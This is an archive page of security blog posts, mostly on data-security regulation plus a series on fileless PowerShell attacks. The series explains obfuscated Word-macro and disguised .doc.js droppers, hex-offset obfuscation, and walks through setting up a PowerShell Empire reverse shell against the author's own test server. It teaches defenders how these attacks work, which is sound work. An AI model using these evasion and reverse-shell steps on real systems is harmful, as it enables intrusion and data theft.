All posts by Andy Green

Post-Davos Thoughts on the EU NIS Directive

Post-Davos Thoughts on the EU NIS Directive

I’ve been meaning to read the 80-page report published by the World Economic Forum (WEF) on the global risks humankind now faces. They’re the same folks who bring you the once a year gathering of the world’s bankers and other lesser humanoids held at a popular Swiss ski resort. I was told there was an interesting section on … data security.

And there was. Data security is part of a report intended to help our world leaders also grapple with climate change, nuclear annihilation, pandemics, economic meltdowns, starvation, and  terrorism.

How serious a risk are cyber attacks?

In terms of impact, digital warfare makes the WEF top-ten list of global issues, ranking in the sixth position, between water and food crises, and beating out the spread of infectious diseases in the tenth position. It’s practically a fifth horsemen of the apocalypse.

Some of the worrying factoids that the WEF brought to the attention of presidents, prime ministers, chancellors, and kings was that in 2016 over 350 million malware variants were unleashed on the world, and that by 2020, malware may potentially finds its way to over 8.4 billion IoT devices.

There are about 7.6 billion of us now, and so we’ll soon be outnumbered by poorly secured internet connected silicon-based gadgets. It’s not a very comforting thought.

The WEF then tried to calculate the economic damage of malware. One study they reference puts the global cost at $8 trillion over the next five years.

The gloomy WEF authors single out the economic impact of ransomware. Petya and NotPetya were responsible for large costs to many companies in 2017. Merck, FedEx, and Maersk, for example, each reported offsets to their bottom line of over $300 million last year as a result of NotPetya attacks.

Systemic Risk: We’re All Connected

However, the effects of malware extend beyond economics. One of the important points the report makes is that hackers are also targeting physical infrastructure.

WannaCry was used against the IT systems of railway providers, car manufacturers, and energy utilities. In other words, cyberattacks are disrupting things from happening in the real-world: our lights going out, our transportation halted, or factory lines shut down all because of malware.

And here’s where the WEF report gets especially frightening. Cyber attacks can potentially start a chain reaction of effects that we humans are not good at judging. They call it “systemic risk”

They put it this way:

“Humanity has become remarkably adept at understanding how to mitigate countless conventional risks that can be relatively easily isolated and managed with standard risk management approaches. But we are much less competent when it comes to dealing with complex risks in systems characterized by feedback loops, tipping points and opaque cause-and-effect relationships that can make intervention problematic.”

You can come up with your own doomsday scenarios – malware infects stock market algorithms leading to economic collapse and then war – but the more important point, I think, is that our political leaders will be forced to start addressing this problem.

And yes I’m talking about more regulations or stricter standards on the IT systems used to run our critical infrastructure.

NIS Directive

In the EU, the rules of the road for protecting this infrastructure are far more evolved than in the US. We wrote about the Network and Information Security (NIS) Directive way back in 2016 when it was first approved by the EU Parliament.

The Directive asks EU member states to improve co-operation regarding cyber-attacks against critical sectors of the economy — health, energy, banking, telecom, transportation, as well as some online businesses — and to set minimum standards for cyber security preparedness, including incident notification to regulators. The EU countries had 21 months to “transpose” the directive into national laws.

That puts the deadline for these NIS laws at May 2018, which is just a few months away. Yes, May will be a busy month for IT departments as both the GDPR and NIS go into effect.

For example, the UK recently ended the consultation period for its NIS law. You can read the results of the report here. One key thing to keep in mind is that each national data regulator or authority will be asked to designate operators of “essential services”, EU-speak for critical infrastructure. They have 6-months starting in May to do this.

Anyway, the NIS Directive is a very good first step in monitoring and evaluating malware-based systemic risk. We’ll keep you posted as we learn more from the national regulators as they start implementing their NIS laws.

 

 

Adventures in Malware-Free Hacking, Part III

Adventures in Malware-Free Hacking, Part III

After yakking in the last two posts about malware-free attack techniques, we’re ready to handle a dangerous specimen. The Hybrid Analysis site is the resource I rely on to find these malware critters. While the information that HA provides for each sample —system calls, internet traffic, etc. — should be enough to satisfy a typical IT security pro, there is some value in diving into one of these heavily obfuscated samples to see what’s actually going on.

If you’re playing along at home, I suggest doing this in a sandbox, such as AWS, or if you’re working on your own laptop, just make sure to comment out the system calls that launch PowerShell.

Into the Obfuscated VBA Muck

The malware I eventually found in Hybrid Analysis is a VBA script that was embedded in a Word doc. As I mentioned last time, to see the actual script, you’ll need Frank Boldewin’s OfficeMalScanner.

After extracting the script, which I gave you a peek at in the last post, I decided to load the thing into the MS Word macro library. And then — gasp  —  stepped through it using the built-in debugger.

My goal was to better understand the obfuscations: to play forensic analyst and experience the frustrations involved in this job.

If you’re going into one of these obfuscated scripts for the first time in a debugger, you’ll likely be gulping espressos as you make your way through the mind numbing complex code and watch blankly as you look at the variable L_JEK being assigned the string “77767E6C797A6F6”.

It’s that much fun.

What I learned with this obfuscated VBA script is that only a very small part of it does any of the real work. Most of the rest is there to throw you off trail.

Since we’re getting into the nitty-gritty, I took a screen shot of the teeny part of the code that performs the true evil work of setting up the PowerShell command line that is ultimately launched by the VBA macro.

Tricky: just take the hex value and subtract 7 for the real ascii.

It’s very simple. The VBA code maintains a hex representation of the command line in a few variables and then translates it to a character string. The only “tricky” part is that hex values have been offset by 7.

So for example, the first part of the hex string comes from L_JEK (above). If you take 77 and subtract 7, you’ll get a hex 70. Do the same for 76 and you have obtain hex 6F. Look these up in any ascii table, and you’ll see it maps to the first two letter of “powershell”.

This ain’t a very clever obfuscation, but it doesn’t have to be!

All it has to accomplish is getting past virus scanners searching for obvious keywords or their ascii representations.  And this particular sample does this well enough.

Finally, after the code builds the command line, it then launches it through the CreateProcess function (below).

Either comment out system calls or set a breakpoint before it.

Think about it. A Word doc was sent in a phish mail to an employee. When the doc is opened, this VBA script  automatically launches a PowerShell session to start the next phase of the attack. No binaries involved, and the heavily obfuscated scripts will evade scanners.

Evil!

To further my own education, I pulled out another macro from Hybrid Analytics (below) just to see what else is out there. This second one effectively does the same thing as the code above.

Secret code embedded in VBA.

It’s a little more clever in how it builds the command line. There’s a decode function, called “d”, that filters out characters from a base string by comparing against a secondary string.

It’s a high-school level idea, but it gets the job done: it will evade scanners and fool IT folks who are quickly looking at any logs for unusual activities.

Next Stop

In my first series of post on obfuscation, I showed that Windows Event logging captures enough details of PowerShell sessions — that is, if you enable the appropriate modules — to do a deep analysis after the fact.

Of course, the brilliance of malware-free attacks is that it’s hard to determine whether a PowerShell script at run-time is doing anything evil through a basic parsing of the command line by scanning event logs.

Why?

PowerShell sessions are being launched all the time, and one hacker’s PowerShell poison can be close to another IT admin’s PowerShell power tool. So if you want to alert every time a script downloads something from the Internet, you’ll be sending out too many false positives.

Of course, this leads to this blog’s favorite topic: the failure of perimeter defenses to stop phishing and FUD malware, and the power of User Behavior Analytics.

In short: it’s a losing battle trying to stop hackers from getting past perimeter defenses. The better strategy is to spot unusual file access and application behaviors, and then respond by de-activating accounts or taking another breach response measure.

That’s enough preaching for the day. In the next post, we’ll take a closer look at more advanced types of malware-free attacks.

SEC Guidance on Cyber Incidents and Risk Disclosures

SEC Guidance on Cyber Incidents and Risk Disclosures

You know, because you read it here in the IOS blog, that in the US data breach reporting is not nearly as strict and comprehensive as in the EU. At the federal level, we have tough rules for reporting incidents involving medical data (HIPAA) and less tough ones for financial data (GLBA). At the state level, there is a patchwork of notification laws for the exposure of a select set of identifiers. And that’s it!

Well not quite.

Realizing that cyber incidents can have an impact on the corporate bottom line, the SEC released an official guidance a few years back on reporting cyber security events to investors. For all my financial accountant readers, this information can be found here.

Starting in 2012, publicly traded companies are supposed to acknowledge the consequence of cyber catastrophes in their SEC filings. In describing these incidents, they need to take into account both the indirect and direct costs involved in the cost of remediation, litigation, reputation damage, and lost revenues.

When, What, and Where to Report

In general, you’re supposed to report only incidents that will have a “material impact”. This is lawyer talk for eliminating simple hacks — a hacker got into a single email account — while covering news  that a “reasonable” investor would want to know about: for example, 100 million social security numbers were taken take by a stealthy APT group.

However, there are exceptions.

If a cyber incident was widely reported in the news, then the company needs to file with the SEC regardless of the seriousness of the incident. Also any breaches that involved notifying a state or federal (HIPAA, GLBA, COPAA) regulator would require an SEC filing.

What information do you need to disclose?

You have some wiggle room. The SEC recognizes that too much detail might compromise an ongoing investigation. You should describe at a high level the nature of the breach, and in addition, an estimate of the number of people impacted, the categories of affected data, the remediation efforts that were taken, and the plans to prevent future incidents.

At a minimum, companies will need to report overall cyber risks they face in their annual 10-Ks. For a serious cyber incident, they should file it as an 8-K immediately — although there’s no specific time window — instead of waiting for the quarterly report.

I’m a blogger, not a lawyer, so if you want legal advice, read this to learn what real attorneys have to say on this subject.

Real-World 8-K Filing

Want to get inspired by an actual 8-K material filing for a cyber event?

Gaze on the screenshot below showing the beginning of an cyber incident description for a health company.

They exist: SEC 8-K filings for data breaches.

One last point about these filings. The SEC’s Edgar system, where all this information is reported and kept, in theory should be  a source of information regarding breach incidents for public companies.

Useful to know! At least for security bloggers and other compliance wonks.

Adventures in Malware-Free Hacking, Part II

Adventures in Malware-Free Hacking, Part II

I’m a fan of the Hybrid Analysis site. It’s kind of a malware zoo where you can safely observe dangerous specimens captured in the wild without getting mauled. The HA team runs the malware in safe sandboxes and records systems calls, file created, and internet traffic, displaying the results for each malware sample. So you don’t have to necessarily spend time puzzling over or even, gulp, running the heavily obfuscated code to understand the hackers’ intentions.

The HA samples I focused on use either encasing JavaScript or Visual Basic for Applications (VBA) scripts, which are the “macros” embedded in Word or Excel documents attached to phish mails. These scripts then launch a Powershell session on the victim’s computer. The hackers usually send to the PowerShell a Base64-encoded stream. It’s all very sneaky and meant to make it difficult for monitoring software to find obvious keywords to trigger on.

Mercifully, the HA teams decodes Base64 and displays the plain text. In effect, you don’t really need to focus on how these scripts work because you’ll see the command line of the spawned processes in HA’s “Process launched” section. The screenshots below illustrate this:

Hybrid Analysis captures the Base64-encoded commands sent to a PowerShell process …

… and then decodes it for you. #amazing

In the last post, I created my own mildly obfuscated JavaScript container to launch a PowerShell session.

Then my script, like a lot of PowerShell-based malware, downloads a second PowerShell script from a remote web site. To do this safely, my dudware downloads a harmless 1-line of PS to print out a message.

This being the IOS blog we never, ever do anything nice and easy. Let’s take my scenario a step further.

PowerShell Empire and Reverse Shells

One of the goals of this exercise is to show how (relatively) easy it is for a hacker to get around legacy perimeter defenses and scanning software. If a non-programming security blogger such as myself can cook up potent fully undetected or FUD malware in a couple of afternoons (with help from lots of espressos), imagine what a smart Macedonian teenager can do!

And if you’re an IT security person who needs to convince a stubborn manager – I know they don’t exist, but let’s say you have one – that the company needs to boost its secondary defenses, my malware-free attack example might do the trick.

I’m not suggesting you actually phish management, though you could. If you take this route and use my scripts, the message that prints on their laptops would count as a cybersecurity “Boo!”.  It may be effective in your case.

But if your manager then challenges you by saying, “so what”, you can then follow up with what I’m about to show you.

Hackers want to gain direct access to the victim’s laptop or server. We’ve already reviewed how Remote Access Trojans (RATs) can be used to sneakily send and download files, issue commands, and hunt for valuable content.

However, you don’t have to go that far. It’s very easy to gain shell access, which for certain situations might be all a hacker requires – to get in and get out with a few sensitive files from the CEO’s laptop.

Remember the amazing PowerShell Empire post-exploitation environment that I wrote about?

It’s a, cough, pen testing tool, that among its many features lets you easily create a PowerShell-based reverse shell. You can more learn more about this on the PSE site.

Let’s take a quick walk through. I set up my malware testing environment within my AWS infrastructure so I can work safely. And you can do the same to show management a PoC (and not get fired for running grey area hacking software on the premises.)

If you bring up the main console of PowerShell Empire, you’ll see this:

First, you configure a listener on your hacking computer. Enter the commander “listener”, and follow up with “set Host” and the IP address of your system — that’s the “phone home” address for the reverse shell. Then launch the listener process with an “execute” command (below). The listener forms one end of your shell connection.

For the other, you’ll need to generate agent-side code, by entering the “launcher” command (below). This generates code for a PowerShell agent — note that it’s Base64-encoded — and will form the second stage of the payload. In other words, my JavaScript encasing code from last time will now pull down the PowerShell launcher agent, instead of the harmless code to output “Evil Malware”, and  connect to the remote agent in reverse-shell fashion.

Reverse-shell magic. This encoded PowerShell command will connect back to theremote listener and set up a shell.

To run this experiment, I played the part of an innocent victim and clicked on Evil.doc, which is  the JavaScript I set up last time. Remember? The PowerShell was configured to not pop-up a window, so the victim won’t notice anything unusual is going on. However, if you look at the Windows Task Manager, you’ll see the background PowerShell process, which may not trigger alarms ’cause it’s just PowerShell, right?

Now when you click on Evil.doc, a hidden background process will connect to the PowerShell Empire agent.

Putting on my hacker-pentester hat, I returned to my PowerShell Empire console, and now see the message that my agent is active.

I then issued an interact command to pop up a shell in PSE. And I’m in! In short: I hacked into the Taco server that I set-up once upon a time.

What I just described is not a lot of work. If you’re doing this for kicks during a long lunch hour or two to improve your infosec knowledge, it’s a great way to see how hackers get around border security defenses and stealthily lurk in your system.

And IT managers who believe that they’ve built breach-proof defense may, fingers crossed, find this enlightening – if you can convince them to sit down long enough.

Let’s Go Live

As I’ve been suggesting, real-world malware-free hacking is just variation on what I just presented. To get a little bit of a preview of the next post, I searched for Hybrid Analysis specimen that works in a similar fashion to my made-up sample. I didn’t have to search very long – there’s lots of this attack technique on their site

The malware I eventually found in Hybrid Analysis is a VBA script that was embedded in a Word doc. So instead of faking the doc extension, which I did for my JavaScript example, this malware-free malware is really, truly, a Microsoft document.

If you’re playing along at home, I picked this sample, called rfq.doc.

I quickly learned you often can’t directly pull out the actual evil VBA scripts. The hackers compressed or hid them, and they won’t show up in Word’s built-in macro tools.

You’ll need a special tool to extract it. Fortunately, I stumbled upon Frank Boldewin’s OfficeMalScanner. Danke, Frank.

Using this tool, I pulled out the heavily obfuscated VBA code. It looks a little bit like this:

Obfuscation done by pros. I’m impressed!

Attackers are really good at obfuscation, and my efforts in creating Evil.doc was clearly the work of a rank amateur.

Anyway, next time we’ll get out our Word VBA debuggers, delve into this code a little bit, and compare our analysis to what HA came up with it.

Continue reading the next post in "Malware-Free Hacking"

Adventures in Malware-Free Hacking, Part I

Adventures in Malware-Free Hacking, Part I

When I first started looking into the topic of hackers living off the land by using available tools and software on the victim’s computer, little did I suspect that it would become a major attack trend. It’s now the subject of scary tech headlines, and security pros are saying it’s on the rise. It seems like a good time for a multi-part IOS blog series on this subject.

Known also as file-less or zero-footprint attacks, malware-free hacking typically uses PowerShell on Windows systems to stealthily run commands to search and exfiltrate valuable content. To IT security team monitoring for hacker activities, file-less attack are very difficult to spot, often evading virus scanners and other signature-based detection systems.

In short, legacy defense can’t really deal with this style of attack. Of course there is, ahem, security software that will spot the malware activity on file systems.

Anyway, I’ve written about  some of these ideas before in my PowerShell obfuscation series, but more from a theoretical view. Then I discovered the Hybrid Analysis site, where you can find uploaded samples of malware captured in the wild.

Wild PowerShell

I thought it would be a great place to look for some file-less malware specimens. I wasn’t disappointed. By the way, if you want to go on your own malware hunting expedition, you’ll have to be vetted by the Hybrid Analysis folks so they know you’re doing white hat work. As a blogger who writes about security, I passed with flying colors. I’m sure you will too.

Besides having samples, they also provide great insights into what the malware is doing. Hybrid Analysis runs the submitted malware in their own sandbox, and monitors for system calls, processes launched, and Internet activity, as well as pulling out suspicious text strings.

For binaries and other executables in particular, where you can’t even look at the actual high-level code, this container technique allows HA to decide whether the malware is evil or merely suspicious based on its run-time activity. And then they’ll rate the sample.

For the malware-free PowerShell and other scripting samples (Visual Basic, JavaScript, etc.) I was looking for, I could see the actual code. For example, I came across this PowerShell creature:

You too can run base64 encoded PowerShell to evade detection. Note the use of the Noninteractive parameter in this live sample from Hybrid Analysis.

If you’ve read my obfuscation posts, you’ll know that the -e parameter indicates that what follows is base64 encoded. By the way Hybrid Analysis helpfully provides the decoded PowerShell as well. If you want to try decoding base64 PS on your own, you can run this command to do the work: $DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))

Getting in Deeper

I decoded the script using this technique, and you can see the resulting plaintext PowerShell malware below.

Note the time sensitivity of this PS malware, and the use of cookies to pass back more information. I modified this real-world sample in my own testing.

I was feeling a little nervous handling this live malware on my own laptop. Attention Varonis IT Security: please note that I worked with an on-line PowerShell console and also my own separate AWS environment. Got that, IT?

Anyway, we’ve seen this particular attack style before —  in the PS obfuscation series — wherein the base64 encoded PS is itself pulling more of the malware from another site, creating a .Net Framework WebClient object to do the heavy lifting.

Why this approach?

For security software that’s scanning the Windows event log, the base64 encoding prevents text-based pattern matching from doing some easy detection – matching on say the string “WebClient”. And since the real evil part of the malware is then downloaded and injected into the PS app itself, this approach completely evades detection. Or so I thought.

It turns out with more advanced Windows PowerShell logging enabled – see my post — you can effectively see the downloaded string in the event log. I commend Microsoft (as did others!) for this added level of logging.

However, hackers then responded by base64 encoding the downloaded PowerShell from the remote site, so it would then show up in the Windows event log like the encoded sample above. Makes sense, right?

Adding More Scripting Sauce

The real-world samples in Hybrid Analysis then take this idea a step further. Hackers cleverly hide this PowerShell attack in Microsoft Office macros written in Visual Basic and in other scripts. The idea is that the victim receives a phish mail from say, FedEx, with a Word doc described as an invoice. She then clicks on the doc that then launches a macro that then eventually launches the actual PowerShell.

Often times, the Visual Basic script itself is obfuscated so that it evades virus and malware scanners.

Yes, it’s complicated and evil. And I’m only doing a very shallow dive.

In the spirit of the above, I decided as a training exercise to encase the above PowerShell within some obfuscated JavaScript. You can see the results of my hacking handiwork:

Obfuscated JavaScript hiding the encoded PowerShell. Real hackers, of course, do this better than me.

There is one technique I borrowed from “in the wild” samples: the use of  Wscript.Shell to launch the actual encoded PowerShell. It’s the way you get out of the script environment to interact with the rest of the system.

By the way, JavaScript is on its own a vehicle for delivering malware. Many Windows environment have by default the Windows Script Host, which will directly run JS.  In this scenario, the encasing JS malware is attached as a file with a .doc.js suffix.  Windows will only show the first suffix, so it will appear to the victim as a Word doc.  The JS icon is rendered as a scroll-like graphic. Not surprisingly, people will click on this attachment thinking it’s a document.

Don’t click on that JS icon that resembles a scroll! It will download evil malware. You’ve been warned.

For my own encasing JavaScript malware, I modified the PowerShell sample above to download a script from a web site I control. The remote PS script merely prints out “Evil Malware”.

Not very evil.

Of course, real hackers are interested in gaining access to a laptop or server, say, through a shell..

In the next post, I’ll show how to do this by using PowerShell Empire, which I wrote about once upon a time.

We probably dove a little too deep for an introductory post, so I’ll let you catch your breath and cover some of this again next time. And then we can start grokking real-world malware-free attacks with the preliminaries out of the way.

 

Continue reading the next post in "Malware-Free Hacking"

Our Most Underappreciated Blog Posts of 2017

Our Most Underappreciated Blog Posts of 2017

Another year, another 1293 data breaches involving over 174 million records. According to our friends at the Identity Theft Resource Center, 2017 has made history by breaking 2016’s record breaking 1091 breaches. Obviously it’s been a year that many who directly defend corporate and government systems will want to forget.

Before we completely wipe 2017 from our memory banks, I decided to take one last look at the previous 12 months worth of IOS posts.  While there are more than a few posts that did not receive the traffic we had hoped, they nevertheless contained some really valuable security ideas and practical advice.

In no particular order, here are my favorite underachieving posts of the 2017 blogging year.

Interviews

Wade Baker Speaks – We did a lot of interviews with security pros this year —researchers, front-line IT warriors, CDOs, privacy attorneys.  But I was most excited by our chat with Wade Baker. The name may not be familiar, but for years Baker produced the Verizon DBIR, this blog’s favorite source of breach stats. In this transcript, Wade shares great data-driven insights into the threat environment, data breach costs, and how to convince executives to invest in more data security.

Ann Cavoukian and GDPR – It’s hard to believe that the General Data Protection Regulation (GDPR) is only a few months away. You can draw a line from Cavoukian’s Privacy by Design ideas to the GDPR.  For companies doing business in the EU, it will soon be the case that PbD will effectively be the law. Read the Cavoukian transcript to get more inspired.

Diversity and Data Security – The more I learn about data security and privacy, the more I’m convinced that it will “take a village”.  The threat is too complex for it to be pigeon-holed into an engineering problem. A real-world approach will involve multiple disciplines — psychology, sociology, law, design, red-team thinking, along with computer smarts. In this interview with Allison Avery, Senior Organizational Development & Diversity Excellence Specialist at NYU Langone Medical Center, we learn that you shouldn’t have preconceived notions of who has the right cyber talents.

Infosec Education

PowerShell Malware –  PowerShell is a great next-generation command line shell. In the last few years, hackers have realized this as well and are using PowerShell for malware-free hacking. A few months ago I started looking into obfuscated PowerShell techniques, which allow hackers to hide the evil PowerShell and make it almost impossible for traditional scanners to detect. This is good information for IT people who need to get a first look at the new threat environment. In this two-part series, I referenced a Black Hat presentation given by Lee Holmes — yeah, that guy!  Check out Lee’s comment on the post.

Varonis and Ransomware – This was certainly the year of weaponized ransomware with WannaCry, Petya, et. al. using the NSA-discovered EternalBlue exploit to hold data hostage on a global scale. In this post, we explain how our DatAlert software can be used to detect PsExec, which is used to spread the Petya-variant of the malware. And in this other ransomware post, we also explain how to use DatAlert to detect the mass encryption of files and to limit your risks after ransomware infection.

PowerShell as a Cyber Monitoring Tool – I spent a bit of effort in this long series explaining how to use PowerShell to classify data and monitor events — kind of a roll-your-own Varonis. Alas, it didn’t get the exposure I had hoped. But there are some really great PowerShell tips, and sample code using Register-EngineEvent to monitor low-level file access events. A must read if you’re a PowerShell DIY-er.

Compliance

NIS, the Next Big EU Security Law – While we’ve all been focused on the EU GDPR, there’s more EU data security rules that go into effect in 2018. For example, The Network and Information Security (NIS) Directive.  EU countries have until July 2018 to “transpose” this directive into their own national laws. Effectively, the NIS Directive asks companies involved in critical infrastructure — energy, transportation, telecom, and Internet — to have in place data security procedures and to notify regulators when there’s a serious cyber incident. Unlike the GDPR, this directive is not just about data exposure but covers any significant cyber event, including DoS, ransomware, and data destruction.

GDPR’s 72-Hour Breach Notification – One particular GDPR requirement that’s been causing major headaches for IT is the new breach notification rules. In October, we received guidelines from the regulators. It turns out that there’s more flexibility than was first thought. For example, you can provide EU regulators partial information in the first 72-hours after discovery and more complete information as it becomes available. And there are many instances where companies will not have to additionally contact individuals if the personal data exposed is not financially harmful. It’s complicated so read this post to learn the subtleties.

By the way, we’ve been very proud of our GDPR coverage. At least one of our posts has been snippetized by Google, which means that at least Google’s algorithms think our GDPR content is the cat’s meow. Just sayin’.

Podcasts

Man vs. Machine – Each week Cindy Ng leads a discussion with a few other Varonians, including Mike Buckbee, Killian Englert, and Kris Keyser. In this fascinating podcast, Cindy and her panelists take on the question of ethics in software and data security design. We know all too well that data security is often not thought about when products are sold to consumers — maybe afterwards after a hack. We can and should do a better job in training developers and introducing better data laws, for example the EU GDPR. But what is “good enough” for algorithms that think for themselves in, say,  autonomous cars?  I don’t have the answer, but is what great fun listening to this group talk about this issue.

Cybercrime Startups – It’s strange at first to think of hackers as entrepreneurs and their criminal team as a startup. But in fact there are similarities, and hacking in 2017 starts looking like a viable career option for some. In this perfect drive-time podcast, our panelists explore the everyday world of the cybercrime startup.

Fun Security Facts

Securing S3 –  As someone who uses Amazon Web Services (AWS) to quickly test out ideas for blog posts, I’m a little in awe of Amazon’s cloud magic and also afraid to touch many of the configuration options. Apparently, I’m not the only one who gets lost in AWS since there have been major breach involving its heavily used data storage feature, known as S3. In this post, Mikes covers S3’s buckets and objects and explains how to set up security policies. Find out how to avoid being an S3 victim in 2018!

DNSMessenger: 2017’s Most Beloved Remote Access Trojan (RAT)

DNSMessenger: 2017’s Most Beloved Remote Access Trojan (RAT)

I’ve written a lot about Remote Access Trojans (RATs) over the last few years. So I didn’t think there was that much innovation in this classic hacker software utility. RATs, of course, allow hackers to get shell access and issue commands to search for content and then stealthily copy files. However, I somehow missed, DNSMessenger, a new RAT variant that was discovered earlier this year.

The malware runs when the victim clicks on a Word doc embedded in an email – it’s contained in a VBA script that then launches some PowerShell. Nothing that unusual so far in this phishing approach..

Ultimately, the evil RAT payload is set up in another launch stage. The DNSMessenger RAT is itself a PowerShell script. The way the malware unrolls is intentionally convoluted and obfuscated to make it difficult to spot. .

And what does this PowerShell-based RAT do?

RAT Logic

No one’s saying that a RAT has to be all that complicated. The main processing loop accepts messages that tells the malware  to execute commands and send results back.

Here’s a bit of DNSMessenger code to probe the DNS servers. The addresses are hardcoded.

The clever aspect of DNSMessenger is that — surprise, surprise — it uses DNS as the C2 server to query records from which it pulls in the commands.

It’s a little more complicated than what I’m letting on, and if you want, you can read the original analysis done by Cisco’s Talos security group.

Stealthy RAT

As noted by security pros, DNSMessenger  is effectively “file-less” since it doesn’t have to save any commands from the remote server onto the victim’s file system. Since it uses PowerShell, this makes DNSMessenger very difficult to detect when it’s running.  Using PowerShell also means that virus scanners won’t automatically flag the malware.

This is right out of the malware-less hacking cookbook.

Making it even more deadly is its use of the DNS protocol, which is not one of the usual protocols on which network filtering and monitoring is performed — such as HTTP or HTTPS.

A tip of the (black) hat to the hackers for coming up with this. But that doesn’t mean that DNSMessenger is completely undetectable. The malware does have to access the file system as commands are sent via DNS to scan folders and search for monetizable content. Varonis’s UBA technology would spot anomalies on the account on which DNSMessenger is running on.

It would be great if it were possible to connect the unusual file-access activity to the DNS exfiltration being done by DNSMessenger. Then we’d have hard-proof of an incident in progress.

Varonis Edge

We’ve recently introduced Varonis Edge, which is specifically designed to look for signs of attack at the perimeter, including VPNs, Web Security Gateways, and, yes, DNS.

As I mentioned in my last post, malware-free hacking is on the rise and we should expect to see more of it in 2018.

It would be a good exercise to experiment and analyze a DNSMessenger-style trojan. I can’t do it this month, but I am making as my first New Year’s resolution to try experimenting in January on my AWS environment.

In the meantime, try a demo of Varonis Edge to learn more.

Data Security 2017: We’re All Hacked

Data Security 2017: We’re All Hacked

Remember more innocent times back in early 2017? Before Petya, WannaCry, leaked NSA vulnerabilities, Equifax, and Uber, the state of data security was anything but rosy, but I suppose there was more than a few of us left — consumers and companies — who could say that security incidents did not have a direct impact.

That has changed after Equifax’s massive breach affecting 145 million American adults — I was a victim — and then a series of weaponized ransomware attacks that held corporate data hostage on a global scale.

Is there any major US company that hasn’t been affected by a breach?

Actually, ahem, no.

According to security researcher Mikko Hyponnen, all 500 of the Fortune 500 have been hacked. He didn’t offer evidence, but another cybersecurity research company has some tantalizing clues. A company called DarkOwl scans the dark web for stolen PII and other data, and traces it back to the source. They have strong evidence that all of the Fortune 500 have had data exposed at some point.

We Had Been Warned

Looking over past IOS blog posts, especially for this last year, I see the current massive breach pandemic as completely expected.

Back in 2016, we spoke with Ken Munro, UK’s leading IoT pen tester. After I got over the shock of learning that WiFi coffee makers and Internet-connected weighing scales actually exist, Munro explained that Security by Design is not really a prime directive for IoT gadget makers.

Or as he put it, “You’re making a big step there, which is assuming that the manufacturer gave any thought to an attack from a hacker at all.”

If you read a post from his company’s blog from October 2015 about hacking into an Internet-connected camera, you’ll see all the major ingredients of a now familiar pattern:

  1.  Research vulnerability or (incredibly careless) backdoor in IoT gadget, router, or software;
  2. Take advantage of an exposed external ports to scan for suspect hardware or software;
  3. Enter target system from the Internet and inject malware; and
  4. Hack system, and then spread the malware in worm-like fashion.

This attack pattern (with some variation) was used successfully in 2016 by Mirai, and in 2017 by Pinkslipbot and WannaCry.

WannaCry, though, introduced two new features not seen in classic IoT hacks: an unreported vulnerability – aka Eternal Blue – taken from the NSA’s top-secret TAO group and, of course, ransomware as the deadly payload.

Who could have anticipated that NSA code would make its way to the bad guys who then use it in for their evil attack?

Someone was warning us about that as well!

In January 2014, Cindy and I heard crypto legend Bruce Schneier talk about data security post-Snowden. Schneier warned us that the NSA wouldn’t be able to keep it secrets and that eventually their code would leak or would be re-engineered by hackers. And that is exactly what happened with  WannaCry.

Here are Schneier’s wise words:

“We know that technology democratizes. Today’s secret NSA program, becomes tomorrow’s PhD thesis, becomes the next day’s hacker tool.”

Schneier also noted that many of the NSA’s tricks are based on simply getting around cryptography and perimeter defenses. In short, the NSA hackers were very good at finding ways to exploit our bad habits in choosing weak passwords, not keeping patches up to date, or not changing default settings.

It ain’t advanced cryptography (or even rocket science).

In my recent chat with Wade Baker, the former Verizon DBIR lead, I was reminded of this KISS (keep it simple,stupid) principle, but he had the hard statistical evidence to back it up. Wade told me most attacks are not sophisticated, but take advantage of unforced user errors.

Unfortunately, even in 2017, companies are still learning how to play the game. If you want a prime example of a simple attack, you have only to look at 2017’s massive Equifax breach, which was the result of a well-known bug in the company’s Apache Struts, which remained  unpatched!

Weapons of Malware Destruction

Massive ransomware attacks was the big security story of 2017 — Petya, WannaCry, and NotPetya. By the way, we offered some practical advice on dealing with NotPetya, the Petya variant that was spread through a watering hole — downloaded from a website of a Ukrainian software company.

There are similarities in all of the aforementioned ransomwares: all exploited Eternal Blue and spread using either internal or open external ports. The end result was the same – encrypted files for which companies have to pay ransom in the form of some digital currency.

Ransomware viruses ain’t new either. Old timers may remember the AIDs Trojan, which was DOS-based ransomware spread by sneaker-net.

The big difference, of course, is that this current crop of ransomware can lock up entire file systems  — not just individual C drives — and automatically spreads over the Internet or within an organization.

These are truly WMD – weapons of malware destruction. All the ingredients were in place, and it just took enterprising hackers to weaponize the ransomware

2018?

One area of malware that I believe will continue to be a major headache for IT security is file-less PowerShell and FUD attacks. We wrote a few posts on both these topics in 2017.

Sure there’s nothing new here as well — file-less or malware-free hacking has been used by hackers for years. Some of the tools and techniques have been productized for, cough, pen testing purposes, and so it’s now far easier for anyone to get their hands on these gray tools.

The good news is that Microsoft has made it easier to log PowerShell script execution to spot abnormalities.

The whole topic of whitelisting apps has also picked up speed in recent years. We even tried our own experiments in disabling PowerShell using AppLocker’s whitelisting capabilities. Note: it ain’t easy.

Going forward, it looks like Windows 10 Device Guard offers some real promise in preventing rogue malware from running using whitelisting techniques.

The more important point, though, is that security researchers recognize that the hacker will get in, and the goal should be to make it harder for them to run their apps.

Whitelisting is just one aspect of mitigating threats post-exploitation.

Varonis Data Security Platform can help protect data on the inside and notify you when there’s been a breach. Learn more today!

[Video] Varonis GDPR Risk Assessment   

risk assessment video

Are you ready for GDPR ? According to our survey of 500 IT and risk management decision makers, three out of four are facing serious challenges in achieving compliance when GDPR becomes effective on May 25 2018. Varonis can help.

A good first step in preparing for GDPR is identifying where EU personal data resides in the file system, and then checking that access permissions are set appropriately. But wait, EU personal data identifiers span 28 member countries, encompassing different formats for license plate numbers, national id cards, passport ids, bank accounts, and more.

That’s where our GDPR Patterns can help ! We’ve researched and hand-crafted over 250 GDPR classification expressions to help you discover the EU personal data in your systems, and analyze your exposure.

To learn more, watch this incredibly informative video and sign up today for our GDPR Risk Assessment.

 

Interview With Wade Baker: Verizon DBIR, Breach Costs, & Selling Board...

Interview With Wade Baker: Verizon DBIR, Breach Costs, & Selling Boardrooms on Data Security

Wade Baker is best known for creating and leading the Verizon Data Breach Investigations Report (DBIR). Readers of this blog are familiar with the DBIR as our go-to resource for breach stats and other practical insights into data protection. So we were very excited to listen to Wade speak recently at the O’Reilly Data Security Conference.

In his new role as partner and co-founder of the Cyentia Institute, Wade presented some fascinating research on the disconnect between CISOs and the board of directors. In short: if you can’t relate data security spending back to the business, you won’t get a green-light on your project.

